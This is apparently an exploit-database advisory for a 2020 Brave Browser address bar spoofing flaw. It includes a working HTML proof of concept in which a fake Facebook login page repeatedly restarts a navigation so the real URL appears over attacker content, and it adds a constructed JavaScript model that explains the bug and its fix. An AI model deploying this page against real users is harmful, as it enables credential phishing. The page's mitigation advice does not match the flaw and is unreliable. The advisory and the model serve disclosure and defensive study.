Vendor: Brave Browser
By: N/A
CVSS: 8.8 (HIGH)
CWE: 451 (Address Bar Spoofing)
Product Name: Brave Browser
Affected Version From: 1.2.16 (16.09.30.10)
Affected Version To: 1.9.56
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: iOS and Android
Year: 2020

Brave Browser Suffers from Address Bar Spoofing Vulnerability

Address bar spoofing is a critical vulnerability in which an attacker can make the address bar display a legitimate-looking URL while the content of the web page is not what that URL serves. In simple words, the victim sees a familiar-looking URL, but the content does not come from that URL; it is attacker-controlled content.

Mitigation:

Implement a secure authentication mechanism and use the HTTPS protocol for all web pages.

Exploit-DB raw data:

Brave Browser Suffers from Address Bar Spoofing Vulnerability. Address bar spoofing is a critical vulnerability in which an attacker can make the address bar display a legitimate-looking URL while the content of the web page is not what that URL serves. In simple words, the victim sees a familiar-looking URL, but the content does not come from that URL; it is attacker-controlled content. Some companies say "We recognize that the address bar is the only reliable security indicator in modern browsers".

Products affected:

   - iOS: the latest version, 1.2.16 (16.09.30.10), is affected
   - Android: the latest version, Brave 1.9.56, is affected


Exploit Code:

<!DOCTYPE html>
<html>
<head>
<title>Address Bar spoofing Brave</title>
</head>
<body>
<h1>This is Dummy Facebook</h1>
<!-- Dummy login form: this is the content the victim actually sees -->
<form>
Email: <input type="text" name="username" placeholder="add email"><br>
Password: <input type="text" name="password" placeholder="pass">
</form>
<script>
// Re-issue a navigation to the spoofed site every 10 ms. Each restart
// supersedes the previous, still-pending navigation, so this page stays
// rendered while the address bar shows the target URL.
function f()
{
    location = "https://facebook.com";
}
setInterval(f, 10);
</script>
</body>
</html>
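To show why the timer loop above produces a mismatch, here is a small constructed model of a browser tab's address-bar update policy, added as an example and not taken from Exploit-DB or Brave's code. It assumes a hypothetical attacker origin "https://attacker.example/" and models two policies: updating the bar when a navigation starts (the flawed behaviour the PoC exploits) versus only when it commits.

```javascript
// Constructed model of a tab's address-bar update policy; not Brave's code.
// A navigation is STARTED when the request goes out and COMMITTED when the
// response replaces the current document. The PoC on this page restarts the
// navigation every 10 ms, so it is always "started" and never commits.

class Tab {
  constructor(policy) {
    this.policy = policy;             // "onStart" (flawed) or "onCommit" (correct)
    this.documentUrl = "about:blank"; // URL of the document actually rendered
    this.addressBar = "about:blank";  // URL shown to the user
    this.pending = null;              // started-but-uncommitted navigation
  }
  start(url) {
    this.pending = url;               // a new start supersedes the previous one
    if (this.policy === "onStart") this.addressBar = url;
  }
  commit() {
    if (this.pending === null) return;
    this.documentUrl = this.pending;  // only now does the content change...
    this.addressBar = this.pending;   // ...so only now may the bar change
    this.pending = null;
  }
  // Security invariant: the bar must describe the document on screen.
  spoofed() { return this.addressBar !== this.documentUrl; }
  snapshot() {
    return { addressBar: this.addressBar, documentUrl: this.documentUrl, spoofed: this.spoofed() };
  }
}

// Replay the PoC: load the attacker page, restart the navigation to the
// target `restarts` times before any response lands, then let one commit.
function simulate(policy, restarts,
                  attacker = "https://attacker.example/",   // constructed placeholder
                  target = "https://facebook.com") {
  const tab = new Tab(policy);
  tab.start(attacker);
  tab.commit();                                          // attacker content is rendered
  for (let i = 0; i < restarts; i++) tab.start(target);  // the 10 ms timer firing
  const duringSpoofWindow = tab.snapshot();
  tab.commit();                                          // a navigation finally completes
  return { duringSpoofWindow, afterCommit: tab.snapshot() };
}

// Stand-alone run: the flawed policy shows the target URL over attacker content.
console.log(simulate("onStart", 100).duringSpoofWindow);  // spoofed: true
console.log(simulate("onCommit", 100).duringSpoofWindow); // spoofed: false
```

The fix a browser vendor ships amounts to the "onCommit" policy: the displayed URL changes only when the document it describes has actually replaced the previous one.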